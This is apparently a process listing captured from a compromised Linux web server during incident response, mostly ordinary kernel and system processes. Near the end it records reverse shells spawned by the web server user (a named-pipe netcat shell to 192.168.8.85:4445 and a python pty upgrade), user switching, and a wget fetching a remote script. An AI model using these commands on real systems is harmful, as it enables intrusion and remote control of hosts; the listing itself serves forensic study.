USER         PID    PPID    VSZ   RSS TTY      STAT STIME     TIME COMMAND
root           1       0 169352 12908 ?        Ss   08:31 00:00:04 /sbin/init maybe-ubiquity
root           2       0      0     0 ?        S    08:31 00:00:00 [kthreadd]
root           3       2      0     0 ?        I<   08:31 00:00:00 [rcu_gp]
root           4       2      0     0 ?        I<   08:31 00:00:00 [rcu_par_gp]
root           6       2      0     0 ?        I<   08:31 00:00:00 [kworker/0:0H-kblockd]
root           8       2      0     0 ?        I<   08:31 00:00:00 [mm_percpu_wq]
root           9       2      0     0 ?        S    08:31 00:00:00 [ksoftirqd/0]
root          10       2      0     0 ?        I    08:31 00:00:02 [rcu_sched]
root          11       2      0     0 ?        S    08:31 00:00:00 [migration/0]
root          12       2      0     0 ?        S    08:31 00:00:00 [idle_inject/0]
root          14       2      0     0 ?        S    08:31 00:00:00 [cpuhp/0]
root          15       2      0     0 ?        S    08:31 00:00:00 [cpuhp/1]
root          16       2      0     0 ?        S    08:31 00:00:00 [idle_inject/1]
root          17       2      0     0 ?        S    08:31 00:00:00 [migration/1]
root          18       2      0     0 ?        S    08:31 00:00:00 [ksoftirqd/1]
root          20       2      0     0 ?        I<   08:31 00:00:00 [kworker/1:0H-kblockd]
root          21       2      0     0 ?        S    08:31 00:00:00 [kdevtmpfs]
root          22       2      0     0 ?        I<   08:31 00:00:00 [netns]
root          23       2      0     0 ?        S    08:31 00:00:00 [rcu_tasks_kthre]
root          24       2      0     0 ?        S    08:31 00:00:00 [kauditd]
root          25       2      0     0 ?        S    08:31 00:00:00 [khungtaskd]
root          26       2      0     0 ?        S    08:31 00:00:00 [oom_reaper]
root          27       2      0     0 ?        I<   08:31 00:00:00 [writeback]
root          28       2      0     0 ?        S    08:31 00:00:00 [kcompactd0]
root          29       2      0     0 ?        SN   08:31 00:00:00 [ksmd]
root          30       2      0     0 ?        SN   08:31 00:00:00 [khugepaged]
root          77       2      0     0 ?        I<   08:31 00:00:00 [kintegrityd]
root          78       2      0     0 ?        I<   08:31 00:00:00 [kblockd]
root          79       2      0     0 ?        I<   08:31 00:00:00 [blkcg_punt_bio]
root          80       2      0     0 ?        I<   08:31 00:00:00 [tpm_dev_wq]
root          81       2      0     0 ?        I<   08:31 00:00:00 [ata_sff]
root          82       2      0     0 ?        I<   08:31 00:00:00 [md]
root          83       2      0     0 ?        I<   08:31 00:00:00 [edac-poller]
root          84       2      0     0 ?        I<   08:31 00:00:00 [devfreq_wq]
root          85       2      0     0 ?        S    08:31 00:00:00 [watchdogd]
root          88       2      0     0 ?        S    08:31 00:00:00 [kswapd0]
root          89       2      0     0 ?        S    08:31 00:00:00 [ecryptfs-kthrea]
root          91       2      0     0 ?        I<   08:31 00:00:00 [kthrotld]
root          92       2      0     0 ?        S    08:31 00:00:00 [irq/24-pciehp]
root          93       2      0     0 ?        S    08:31 00:00:00 [irq/25-pciehp]
root          94       2      0     0 ?        S    08:31 00:00:00 [irq/26-pciehp]
root          95       2      0     0 ?        S    08:31 00:00:00 [irq/27-pciehp]
root          96       2      0     0 ?        S    08:31 00:00:00 [irq/28-pciehp]
root          97       2      0     0 ?        S    08:31 00:00:00 [irq/29-pciehp]
root          98       2      0     0 ?        S    08:31 00:00:00 [irq/30-pciehp]
root          99       2      0     0 ?        S    08:31 00:00:00 [irq/31-pciehp]
root         100       2      0     0 ?        S    08:31 00:00:00 [irq/32-pciehp]
root         101       2      0     0 ?        S    08:31 00:00:00 [irq/33-pciehp]
root         102       2      0     0 ?        S    08:31 00:00:00 [irq/34-pciehp]
root         103       2      0     0 ?        S    08:31 00:00:00 [irq/35-pciehp]
root         104       2      0     0 ?        S    08:31 00:00:00 [irq/36-pciehp]
root         105       2      0     0 ?        S    08:31 00:00:00 [irq/37-pciehp]
root         106       2      0     0 ?        S    08:31 00:00:00 [irq/38-pciehp]
root         107       2      0     0 ?        S    08:31 00:00:00 [irq/39-pciehp]
root         108       2      0     0 ?        S    08:31 00:00:00 [irq/40-pciehp]
root         109       2      0     0 ?        S    08:31 00:00:00 [irq/41-pciehp]
root         110       2      0     0 ?        S    08:31 00:00:00 [irq/42-pciehp]
root         111       2      0     0 ?        S    08:31 00:00:00 [irq/43-pciehp]
root         112       2      0     0 ?        S    08:31 00:00:00 [irq/44-pciehp]
root         113       2      0     0 ?        S    08:31 00:00:00 [irq/45-pciehp]
root         114       2      0     0 ?        S    08:31 00:00:00 [irq/46-pciehp]
root         115       2      0     0 ?        S    08:31 00:00:00 [irq/47-pciehp]
root         116       2      0     0 ?        S    08:31 00:00:00 [irq/48-pciehp]
root         117       2      0     0 ?        S    08:31 00:00:00 [irq/49-pciehp]
root         118       2      0     0 ?        S    08:31 00:00:00 [irq/50-pciehp]
root         119       2      0     0 ?        S    08:31 00:00:00 [irq/51-pciehp]
root         120       2      0     0 ?        S    08:31 00:00:00 [irq/52-pciehp]
root         121       2      0     0 ?        S    08:31 00:00:00 [irq/53-pciehp]
root         122       2      0     0 ?        S    08:31 00:00:00 [irq/54-pciehp]
root         123       2      0     0 ?        S    08:31 00:00:00 [irq/55-pciehp]
root         124       2      0     0 ?        I<   08:31 00:00:00 [acpi_thermal_pm]
root         125       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_0]
root         126       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_0]
root         127       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_1]
root         128       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_1]
root         130       2      0     0 ?        I<   08:31 00:00:00 [vfio-irqfd-clea]
root         131       2      0     0 ?        I<   08:31 00:00:00 [ipv6_addrconf]
root         141       2      0     0 ?        I<   08:31 00:00:00 [kstrp]
root         144       2      0     0 ?        I<   08:31 00:00:00 [kworker/u5:0]
root         157       2      0     0 ?        I<   08:31 00:00:00 [charger_manager]
root         197       2      0     0 ?        I<   08:31 00:00:00 [mpt_poll_0]
root         198       2      0     0 ?        I<   08:31 00:00:00 [mpt/0]
root         199       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_2]
root         200       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_2]
root         201       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_3]
root         202       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_3]
root         203       2      0     0 ?        S    08:31 00:00:01 [irq/16-vmwgfx]
root         204       2      0     0 ?        I<   08:31 00:00:00 [ttm_swap]
root         205       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_4]
root         206       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_4]
root         207       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_5]
root         208       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_5]
root         209       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_6]
root         210       2      0     0 ?        I<   08:31 00:00:00 [cryptd]
root         211       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_6]
root         212       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_7]
root         213       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_7]
root         214       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_8]
root         215       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_8]
root         216       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_9]
root         219       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_9]
root         223       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_10]
root         241       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_10]
root         244       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_11]
root         249       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_11]
root         253       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_12]
root         254       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_12]
root         257       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_13]
root         258       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_13]
root         259       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_14]
root         260       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_14]
root         261       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_15]
root         262       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_15]
root         263       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_16]
root         264       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_16]
root         265       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_17]
root         266       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_17]
root         267       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_18]
root         268       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_18]
root         269       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_19]
root         270       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_19]
root         271       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_20]
root         272       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_20]
root         273       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_21]
root         274       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_21]
root         275       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_22]
root         276       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_22]
root         277       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_23]
root         278       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_23]
root         279       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_24]
root         280       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_24]
root         281       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_25]
root         282       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_25]
root         283       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_26]
root         284       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_26]
root         285       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_27]
root         286       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_27]
root         287       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_28]
root         288       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_28]
root         289       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_29]
root         290       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_29]
root         291       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_30]
root         292       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_30]
root         294       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_31]
root         295       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_31]
root         324       2      0     0 ?        S    08:31 00:00:00 [scsi_eh_32]
root         325       2      0     0 ?        I<   08:31 00:00:00 [scsi_tmf_32]
root         326       2      0     0 ?        I<   08:31 00:00:00 [kworker/1:1H-kblockd]
root         330       2      0     0 ?        I<   08:31 00:00:00 [kworker/0:1H-kblockd]
root         362       2      0     0 ?        I<   08:31 00:00:00 [raid5wq]
root         405       2      0     0 ?        S    08:31 00:00:00 [jbd2/sda2-8]
root         406       2      0     0 ?        I<   08:31 00:00:00 [ext4-rsv-conver]
root         477       1  68588 29408 ?        S<s  08:32 00:00:03 /lib/systemd/systemd-journald
root         502       2      0     0 ?        I<   08:32 00:00:00 [ipmi-msghandler]
root         510       1  23552  7020 ?        Ss   08:32 00:00:00 /lib/systemd/systemd-udevd
root         618       2      0     0 ?        I<   08:32 00:00:00 [kaluad]
root         619       2      0     0 ?        I<   08:32 00:00:00 [kmpath_rdacd]
root         620       2      0     0 ?        I<   08:32 00:00:00 [kmpathd]
root         621       2      0     0 ?        I<   08:32 00:00:00 [kmpath_handlerd]
root         622       1 345816 18220 ?        SLsl 08:32 00:00:05 /sbin/multipathd -d -s
root         632       2      0     0 ?        S<   08:32 00:00:00 [loop0]
root         633       2      0     0 ?        S<   08:32 00:00:00 [loop1]
root         634       2      0     0 ?        S<   08:32 00:00:00 [loop2]
systemd+     662       1  90876  6176 ?        Ssl  08:32 00:00:00 /lib/systemd/systemd-timesyncd
root         676       1  46236  9896 ?        Ss   08:32 00:00:00 /usr/bin/VGAuthService
root         677       1 235668  7632 ?        Ssl  08:32 00:00:11 /usr/bin/vmtoolsd
systemd+     884       1  27260  7684 ?        Ss   08:32 00:00:00 /lib/systemd/systemd-networkd
systemd+     886       1  24676 12184 ?        Ss   08:32 00:00:00 /lib/systemd/systemd-resolved
root         911       1 234352  7240 ?        Ssl  08:32 00:00:00 /usr/lib/accountsservice/accounts-daemon
root         914       1   5572  2908 ?        Ss   08:32 00:00:00 /usr/sbin/cron -f
message+     915       1   7660  4792 ?        Ss   08:32 00:00:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         921       1  81960  3728 ?        Ssl  08:32 00:00:00 /usr/sbin/irqbalance --foreground
root         922       1  26652 18280 ?        Ss   08:32 00:00:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         923       1 232724  6752 ?        Ssl  08:32 00:00:00 /usr/lib/policykit-1/polkitd --no-debug
syslog       925       1 224344  4972 ?        Ssl  08:32 00:00:00 /usr/sbin/rsyslogd -n -iNONE
root         926       1 1022792 48208 ?       Ssl  08:32 00:00:01 /usr/lib/snapd/snapd
root         927       1  17372  7728 ?        Ss   08:32 00:00:00 /lib/systemd/systemd-logind
root         929       1 393076 12008 ?        Ssl  08:32 00:00:00 /usr/lib/udisks2/udisksd
daemon       930       1   3796  2216 ?        Ss   08:32 00:00:00 /usr/sbin/atd -f
root         943       1   6020  3960 tty1     Ss   08:32 00:00:00 /bin/login -p --
root         976       1 105156 20420 ?        Ssl  08:32 00:00:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root         982       1 241376 11616 ?        Ssl  08:32 00:00:00 /usr/sbin/ModemManager
root        1596       1  12184  7204 ?        Ss   08:32 00:00:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
webadmin    1850       1  18932  9584 ?        Ss   08:36 00:00:00 /lib/systemd/systemd --user
webadmin    1854    1850 170392  4348 ?        S    08:36 00:00:00 (sd-pam)
webadmin    1859     943   8528  5688 tty1     S+   08:36 00:00:00 -bash
mysql       4562       1 1792632 410828 ?      Ssl  08:40 00:00:54 /usr/sbin/mysqld
root       16034       1 194056 18556 ?        Ss   10:27 00:00:00 /usr/sbin/apache2 -k start
www-data   16035   16034 194552 14304 ?        S    10:27 00:00:00 /usr/sbin/apache2 -k start
www-data   16036   16034 194560 14304 ?        S    10:27 00:00:00 /usr/sbin/apache2 -k start
www-data   16037   16034 194552 14580 ?        S    10:27 00:00:00 /usr/sbin/apache2 -k start
www-data   16038   16034 194560 15380 ?        S    10:27 00:00:00 /usr/sbin/apache2 -k start
www-data   16039   16034 194560 15952 ?        S    10:27 00:00:00 /usr/sbin/apache2 -k start
www-data   16042   16034 194520 13584 ?        S    10:28 00:00:00 /usr/sbin/apache2 -k start
www-data   16574   16034 194552 14192 ?        S    10:40 00:00:00 /usr/sbin/apache2 -k start
root       18182       2      0     0 ?        I    11:39 00:00:00 [kworker/0:0-events]
root       19801       2      0     0 ?        I    12:39 00:00:01 [kworker/1:0-events]
root       20358    1596  13936  9172 ?        Ss   13:01 00:00:00 sshd: webadmin [priv]
webadmin   20465   20358  14068  5912 ?        S    13:01 00:00:00 sshd: webadmin@pts/1
webadmin   20466   20465   8520  5480 pts/1    Ss   13:01 00:00:00 -bash
root       20685       2      0     0 ?        I    13:08 00:00:00 [kworker/0:1-events]
www-data   20701   16042   2608   596 ?        S    13:08 00:00:00 sh -c rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.8.85 4445 >/tmp/f
www-data   20704   20701   2652   516 ?        S    13:08 00:00:00 cat /tmp/f
www-data   20705   20701   2608   592 ?        S    13:08 00:00:00 /bin/sh -i
www-data   20706   20701   3332  2028 ?        S    13:08 00:00:00 nc 192.168.8.85 4445
www-data   20833   20705  15964  9532 ?        S    13:10 00:00:00 python3 -c import pty; pty.spawn("/bin/bash")
www-data   20834   20833   7304  3764 pts/0    Ss   13:10 00:00:00 /bin/bash
root       20979   20834   8992  4124 pts/0    S+   13:15 00:00:00 sudo wget http://192.168.8.111/script.sh
www-data   20996   16039   2608   596 ?        S    13:16 00:00:00 sh -c rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.8.85 4445 >/tmp/f
www-data   20999   20996   2652   580 ?        S    13:16 00:00:00 cat /tmp/f
www-data   21000   20996   2608   532 ?        S    13:16 00:00:00 /bin/sh -i
www-data   21001   20996   3332  1996 ?        S    13:16 00:00:00 nc 192.168.8.85 4445
root       21013   21000   5776  3724 ?        S    13:16 00:00:00 su webadmin
webadmin   21014   21013   6892  1020 ?        S    13:16 00:00:00 bash
www-data   21041   16038   2608   592 ?        S    13:17 00:00:00 sh -c rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.8.85 4445 >/tmp/f
www-data   21044   21041   2652   512 ?        S    13:17 00:00:00 cat /tmp/f
www-data   21045   21041   2608   596 ?        S    13:17 00:00:00 /bin/sh -i
www-data   21046   21041   3332  2032 ?        S    13:17 00:00:00 nc 192.168.8.85 4445
www-data   21047   16034 194496  8100 ?        S    13:17 00:00:00 /usr/sbin/apache2 -k start
www-data   21052   21045  15964  9652 ?        S    13:17 00:00:00 python3 -c import pty; pty.spawn("/bin/bash")
www-data   21053   21052   7304  3800 pts/2    Ss   13:17 00:00:00 /bin/bash
root       21061   21053   8976  3948 pts/2    S    13:17 00:00:00 su webadmin
webadmin   21062   21061   8376  5104 pts/2    S+   13:17 00:00:00 bash
webadmin   21372    1850  82948  3356 ?        SLs  13:28 00:00:00 /usr/bin/gpg-agent --supervised
root       21584       2      0     0 ?        I    13:36 00:00:00 [kworker/u4:0-events_unbound]
root       21735       2      0     0 ?        I    13:39 00:00:00 [kworker/1:1-events]
root       21800       2      0     0 ?        I    13:41 00:00:00 [kworker/u4:1-events_unbound]
root       21928   20466   9432  4668 pts/1    S    13:46 00:00:00 sudo su
root       21929   21928   8376  4308 pts/1    S    13:46 00:00:00 su
root       21930   21929   7236  4100 pts/1    S    13:46 00:00:00 bash
root       21960   21930   7420  4144 pts/1    S+   13:47 00:00:00 /bin/bash ./Cat-Scale.sh
root       21993   21960   8888  3340 pts/1    R+   13:47 00:00:00 ps axwwSo user,pid,ppid,vsz,rss,tname,stat,stime,time,args
